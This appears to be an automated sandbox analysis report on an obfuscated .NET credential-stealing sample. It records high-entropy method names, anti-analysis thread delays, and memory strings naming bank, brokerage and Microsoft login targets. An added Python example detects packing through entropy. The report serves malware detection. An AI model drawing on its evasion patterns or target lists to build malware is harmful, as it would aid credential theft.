                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, lbcVD2GDTHB2oaAfub.cs | High entropy of concatenated method names: 'fSGRlDEoR5', 'DjJROZcRAC', 'I50RKQGHKI', 'nh4RUkhxti', 'WiVRZxMlpC', 'CugRPCJ2MU', 'ECVRfUT0Wg', 'haNRnyV4Pb', 'dvFRE3oHkK', 'xSwRbmbmJV'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, oh4SCQX4gNWAD6iyPoO.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oBaMbiwpiq', 'rPHMkVb8gZ', 'DTbMGKGHvO', 'tJKMhdtHNI', 'y4MM52lr6h', 'd5AMqSFUQG', 'LpVMI6KlLv'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rgGUGalHrgysDRf4jP.cs | High entropy of concatenated method names: 'oFu2h8uyps', 'npY25mNrA1', 'GHG2qbLVuj', 'lQi2IjLnB4', 'rbt2BIpvDm', 'r2H2wPjPwn', 'cFe2gvK0uA', 'dgs2SfM4VI', 'cob239Q0IR', 'UIM2HrBxnP'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, KZxW7jiH22LPS7HxfA.cs | High entropy of concatenated method names: 'C7CTYuGwSV', 'xuPTav8CGg', 'nfS6yDl0oS', 'z4D6ZIxuNT', 'hHQ6PnmaGa', 'FPj69r5pRG', 'yw06fbZkMw', 'dDg6nwnsYi', 'CO76DyJrTZ', 'B5K6Eh33av'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rEpPJQV6URL37f8mXq.cs | High entropy of concatenated method names: 'aQMjpC0BfE', 'BEwjWhbKLR', 'nZ9j2gO2FO', 'Cvfj6cgehK', 'LWbjTl3AJK', 'FOGj1YEaLo', 'TKSj8iBIQ9', 'ERXjVP7NV9', 'HtLjcvfFCt', 'YNwjC6lMdF'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, ClNdkUXX0RfnYApgJkn.cs | High entropy of concatenated method names: 'h7gMHM77eF', 'JitMzDnVDJ', 'fPCo4LA2L1', 'd6YoX52FeU', 'kKQoLUww1l', 'CL2ojKNyb3', 'lefouXfFfd', 'cmjopIWKyl', 'SXWoWZY9ZB', 'J73o2HdkaI'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, Bwb3C9wDBap2ZIO8VC.cs | High entropy of concatenated method names: 'zi5dSNYNm0', 'lbidHAvlvu', 'XcIN4tFy3e', 'KxONXLOsCv', 'eRtdbmHk5u', 'YIudkHDhu7', 'aHxdGYs6Ht', 'b3idhiAm7i', 'OFxd5PPwo9', 'dIedq4JGpX'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, wnMmFUOlgHMK4ZpUF2.cs | High entropy of concatenated method names: 'tnL6FGbpR5', 'obA6m9CqKF', 'Cd76lib8k0', 'UvE6OeHVNP', 'uwx6J2n3kH', 'LvT6AE1FJ5', 'BsM6drVp3f', 'Xcf6NhIrPx', 'SSw6rmUQCT', 'y086MPlDAQ'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, oTV8SOKp6GrbJLE30p.cs | High entropy of concatenated method names: 'PTj1pt1nGi', 'nOF122n6hA', 'Jyw1Tv10So', 'Vuo185TEKD', 'tEZ1Vp1YV0', 'kEETBFKgEV', 'eaiTwqM1k8', 'dGHTgK89SH', 'ipmTSYNYTC', 'GRbT3Ni3Eu'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, Eh8slI3pIOYe0xEpom.cs | High entropy of concatenated method names: 'bt0rKUcxNd', 'jgRrUIDD5l', 'N73ry8taI9', 'iJfrZVHc12', 'dDhrPXerof', 'C2cr9tyPr3', 'RaMrf6QabY', 'h47rnFwXqm', 'XILrDaHOKo', 'HcYrEpYsuM'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack | High entropy of concatenated method names: the same 22 classes as in the 6d10000.4 dump above (BPHUtOLnNX1TNBBy6C.cs through Eh8slI3pIOYe0xEpom.cs), each with a method-name list identical to the one shown there; the repeated listing is not reproduced here.
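The two entropy-based findings above (the .text section at 7.72 bits per byte, and the 'High entropy of concatenated method names' lists) rest on the same measurement: Shannon entropy over a byte string. What follows is an added example that reproduces both checks; it is not Joe Sandbox's code, the thresholds are assumptions chosen for illustration (the report does not state the cut-offs it applies), and the two section buffers are constructed. The obfuscated method names are copied from the DlRvq5yJkomY4LIf3S.cs finding; the control set is the unrenamed framework overrides (ToString, Dispose, CanConvertFrom, ...) that survive in the same dumps, which is the mix a renaming obfuscator leaves behind: overrides of framework virtuals keep their names because the runtime binds them by name, everything else becomes a base-62 token.

```python
"""Entropy heuristics behind the 'Data Obfuscation' findings (added example,
not Joe Sandbox code).

Two measurements are reproduced:
  1. byte entropy of a PE section (the report flags .text at 7.72 bits/byte)
  2. entropy of the concatenated method names of one .NET class
Thresholds are assumptions for this example; the sandbox's real cut-offs are
not published in the report.
"""
import math
import random
from collections import Counter

# Assumed thresholds (not taken from the report).
SECTION_ENTROPY_THRESHOLD = 7.0   # bits per byte; 8.0 is the ceiling
NAME_ENTROPY_THRESHOLD = 5.0      # bits per char; log2(62) = 5.95 for base-62 tokens


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_looks_packed(section_bytes: bytes,
                         threshold: float = SECTION_ENTROPY_THRESHOLD) -> bool:
    """True when a section's byte entropy sits in the compressed/encrypted range.

    Native code and .NET IL normally measure well under 7 bits/byte; a .text
    section near the 8-bit ceiling points at a packed or encrypted payload.
    """
    return shannon_entropy(section_bytes) >= threshold


def method_names_look_obfuscated(names,
                                 threshold: float = NAME_ENTROPY_THRESHOLD) -> bool:
    """True when the concatenated method names of one class have near-random
    character statistics, as produced by renaming obfuscators."""
    blob = "".join(names).encode("ascii", "replace")
    return shannon_entropy(blob) >= threshold


# Method names copied from the DlRvq5yJkomY4LIf3S.cs finding in the report.
OBFUSCATED_NAMES = ['kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU',
                    'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l',
                    'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76']

# Control set: the unrenamed framework overrides that survive in the same dumps.
FRAMEWORK_NAMES = ['CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ToString', 'Dispose',
                   'GetEditStyle', 'EditValue', 'ProcessDialogKey', 'Next', 'NextBytes']

# Constructed section contents: seeded pseudo-random bytes stand in for an
# encrypted payload; repeated ASCII stands in for ordinary code and strings.
_rng = random.Random(1)
PACKED_SECTION = bytes(_rng.getrandbits(8) for _ in range(4096))
PLAIN_SECTION = b"mov eax, [ebp+8]; call GetProcAddress; ret\n" * 100


def triage():
    """Return (entropy, flagged) for each constructed input."""
    obf_blob = "".join(OBFUSCATED_NAMES).encode()
    fw_blob = "".join(FRAMEWORK_NAMES).encode()
    return {
        "packed_section": (round(shannon_entropy(PACKED_SECTION), 2),
                           section_looks_packed(PACKED_SECTION)),
        "plain_section": (round(shannon_entropy(PLAIN_SECTION), 2),
                          section_looks_packed(PLAIN_SECTION)),
        "obfuscated_names": (round(shannon_entropy(obf_blob), 2),
                             method_names_look_obfuscated(OBFUSCATED_NAMES)),
        "framework_names": (round(shannon_entropy(fw_blob), 2),
                            method_names_look_obfuscated(FRAMEWORK_NAMES)),
    }


if __name__ == "__main__":
    for label, (bits, flagged) in triage().items():
        print(f"{label:17s} entropy={bits:5.2f}  flagged={flagged}")
```

The name check deliberately concatenates all methods of a class before measuring, as the report's wording suggests: a single short identifier cannot be told from noise, but a few hundred characters of base-62 tokens sit close to the 5.95-bit ceiling while English-derived framework names stay around 4.5 bits. A real triage tool would read section bytes from the PE section table instead of the constructed buffers used here.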
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Process information set: NOOPENFILEERRORBOX (this record appears 99 times in the report)

                    Malware Analysis System Evasion

                    Source: Yara match | File source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Memory allocated: 9A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Memory allocated: 2720000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Memory allocated: 2610000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Memory allocated: 8850000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Memory allocated: 9850000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Memory allocated: 9A50000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Memory allocated: AA50000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Memory allocated: 3120000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Memory allocated: 32F0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Memory allocated: 3120000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Thread delayed: delay time: 922337203685477 (2 records; this is TimeSpan.MaxValue expressed in milliseconds, i.e. an effectively unbounded wait)
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Thread delayed: delay time (50 records, a countdown from 600000 shrinking by roughly 110 per step): 600000, 599875, 599766, 599656, 599546, 599437, 599328, 599219, 599110, 599000, 598891, 598766, 598641, 598531, 598422, 598312, 598203, 598094, 597984, 597875, 597766, 597640, 597531, 597422, 597313, 597188, 597063, 596938, 596813, 596703, 596594, 596469, 596359, 596250, 596141, 596031, 595922, 595813, 595688, 595578, 595469, 595344, 595235, 595110, 594985, 594860, 594735, 594610, 594485, 594360
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeWindow / User API: threadDelayed 1522Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeWindow / User API: threadDelayed 8323Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7948Thread sleep count: 1522 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7948Thread sleep count: 8323 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -598094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -597063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596141s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -596031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595688s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -595110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -594985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -594860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -594735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -594610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -594485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe TID: 7944Thread sleep time: -594360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599110Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598891Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598641Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598422Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597766Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597640Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597531Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597188Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 597063Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596813Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595813Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595688Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595578Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595344Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594485Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeThread delayed: delay time: 594360Jump to behavior
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                    Source: kP8EgMorTr.exe, 00000003.00000002.3698800936.00000000014D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.00000000043D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E997B0 LdrInitializeThunk,3_2_05E997B0
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess created: C:\Users\user\Desktop\kP8EgMorTr.exe "C:\Users\user\Desktop\kP8EgMorTr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Users\user\Desktop\kP8EgMorTr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
